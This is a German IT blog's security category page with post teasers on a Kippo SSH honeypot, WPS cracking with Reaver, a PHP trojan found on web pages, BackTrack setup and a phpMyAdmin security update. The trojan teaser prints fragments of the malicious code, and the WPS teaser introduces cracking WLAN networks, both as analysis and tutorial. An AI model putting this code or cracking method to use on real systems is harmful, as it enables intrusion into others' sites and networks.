Sicherheit
SSH Honeypod Kippo
07.08.2012 | 
Ein Honeypod ist ein System, was vorgaukelt ein richtiges SSH Server zu sein, Verbindungen mit sehr einfachen Passwörtern (Mehrzahl möglich) zulässt. Im Hintergrund protokolliert der Honeypod alles was gemacht wird und liefert ein Log davon. In Wirklichkeit wird das System aber zur keinen Zeit kompromittiert.
Für den SSH Dienst welcher ganz oben auf der Liste der Angreifer steht, gibt es ein Dienst der Kippo heisst.
Installation
Um Kippo zu installieren muss Python und ein paar Abhängigkeiten installiert werden, sowie ein User eingerichtet werden:
apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted -y adduser kippouser
Ist dies gemacht, geht es darum Kippo zu installieren:
mkdir /opt/kippo cd /opt/kippo chown kippouser:kippouser /opt/kippo su -c "wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz" kippouser su -c "tar xf kippo-0.5.tar.gz" kippouser su -c "cd kippo-0.5" kippouser
Veröffentlicht in 
Schlagworte: WLAN (WEP/WPA/WPA2) mit WPS hacken
Hier zeige ich wie man mit wenig Aufwand sehr viele WLAN Netze knacken kann. Dazu nutzen wir eine Sicherheitslücke im vielen WLAN Routern aus. Auch kann man sich vor dieser Methode schützen.
Ich habe bereits über die Blacktrack Distribution (Ubuntu) geschrieben, wie man dies installiert und die Adapter für das Asus Ultrabook UX31 zum laufen bekommt.
Heute zeige ich eine Möglichkeit auf WLAN’s Passwörter damit wiederherzustellen.
Dafür gibt es einige Tools, welche mit BlackTrack CD gleich mitgeliefert werden. Die mitgelieferten Tools können zwar alle WLAN Netze öffnen, benötigen aber mehr Aufwand und mehr Zeit dazu.
Ein neues Tool mit den Namen Reaver nutzt eine Sicherheitslücke welche in sehr vielen Routern vorhanden ist, um die Verschlüsselung zu öffnen, was deshalb viel schneller geht.
Die Sicherheitslücke attackiert die WPS Implementierung welche in diversen Routern vorhanden ist. Diese erlaubt es, automatisiert Geräte ins Netz aufzunehmen ohne Kenntnis für das wirkliche WLAN Passwort.
Dies sollte das Einrichten für Router erleichtern, doch hat in dem Fall ein neue Sicherheitslücke aufgemacht.
Als Grundlage für das Tool nutze ich wiederum die BackTrack Distrbution auf welcher diese Anleitung aufbaut. Da Reaver aber nicht mit BackTrack mitgeliefert wird, müssen wir dieses vorab installieren.
Dazu starten Diesen Beitrag weiterlesen »
PHP Trojaner von adveconfirm.com
Ich habe diverse Webseiten von einem Kollegen auf einen meiner Server verschiebt. Dabei waren plötzlich diverse Seiten von einer Ladezeit von 20 Sekunden betroffen. Also habe ich ein Blick in den Source riskiert und folgenden Code gefunden, wo ich zerstückelt hier analysiere:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
Zuerst schaut der Code, ob er bereits einmal aufgeführt wurde, wenn nicht, startet er sich selbst, sonst lässt er es.
So führt sich der Code nur einmal aus.
// This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = "";
Der Code ist kommentiert 
Nett. Laut Kommentar erstellt es Statistiken von Bots.
if((strstr($sUserAgent, 'google') == false) // Bot comes
&& (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
&& (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
&& (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
&& (strstr($sUserAgent, 'bot') == false) && (strstr($sUserAgent, 'yahoo') == false))
{
Laut Kommentar, wenn ein Bot kommt, aber die Funktion macht das Gegenteil, wenn kein Bot kommt, also ein normaler User (keine opera und safari User)…
Diesen Beitrag weiterlesen »
BackTrack 5 RC1 (Ubuntu) auf UX31
BackTrack ist ein OS mit Penetration Testing Tools auf Ubuntu Basis. Die neueste Version 5RC1 kann von folgender Seite heruntergeladen werden: http://www.backtrack-linux.org/downloads/ (Ich habe die KDE x64 Version genommen)
Das OS erkennt leider nicht gleich die ganze Hardware vom Anfang an und da muss man ein wenig nachhelfen.
Ethernet USB-LAN Adapter
Dieser wird komplett nicht erkennt und daher sollte man den dazugehörigen Treiber herunterladen. Dazu gibt man in der Shell folgenden Befehl ein:
wget http://www.asix.com.tw/FrootAttach/driver/AX88772B_772A_760_772_178_LINUX_Driver_v4.2.0_Source.zip
cd AX88772B_772A_760_772_178_LINUX_Driver_v4.1.0_Source
make
sudo make install
sudo modprobe asix
echo "asix" >> /etc/modules
Anschliessend wurde der richtige Treiber installiert und aktiviert.
WLAN Adapter
Der WLAN Adapter wird zwar erkennt, ist aber beim normalen Systemstart mit einem Softlock versehen. Um diesen zu entfernen sind diese Befehle nötig:
Diesen Beitrag weiterlesen »
PhpMyAdmin 3.4.9 – Sicherheitsupdate
PhpMyAdmin 3.4.9 ist vor wenigen Tagen erschienen und Jede Person sollte schnellst möglichst diese Version installieren!
In allen Versionen inkl. 3.4.8 ist ein Sicherheitsloch, womit man Domain übergreifend ohne Password in die Datenbanken kommt. Ein recht happiger XSS Fix dem Fall.
Der Bug wurde am 7. Dezember entdeckt und bereits am 21. Dezember geschlossen. Aus diesem Grund wurde auch bereits das Proof of Concept am 22. Dezember publiziert, womit diverse Genossen den Bug auf noch nicht aktualisierten Versionen ausnutzen könnten.
Aus dem Grund ist ein Update erst recht ans Herz gelegt!
Weiterhin möchte ich hier noch 2 sehr kleine Tipps zum Besten geben. PhpMyAdmin hat neuerdings noch “neue Funktionen” welche man gegebenenfalls nicht nutzen möchte. Leider erscheint dann aber immer folgende Meldung:
Der phpMyAdmin-Konfigurationsspeicher ist nicht vollständig konfiguriert, einige erweiterte Funktionen wurden deaktiviert. Klicken Sie hier, um herauszufinden warum.
Dazu öffnet man einfach die main.php im PhpMyAdmin Verzeichnis und geht zur Zeile 298:
if ($server > 0) {
Diese ändert Diesen Beitrag weiterlesen »
 Kontaktdaten |
IT Blögg? Ein männlicher IT Nerd durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. + |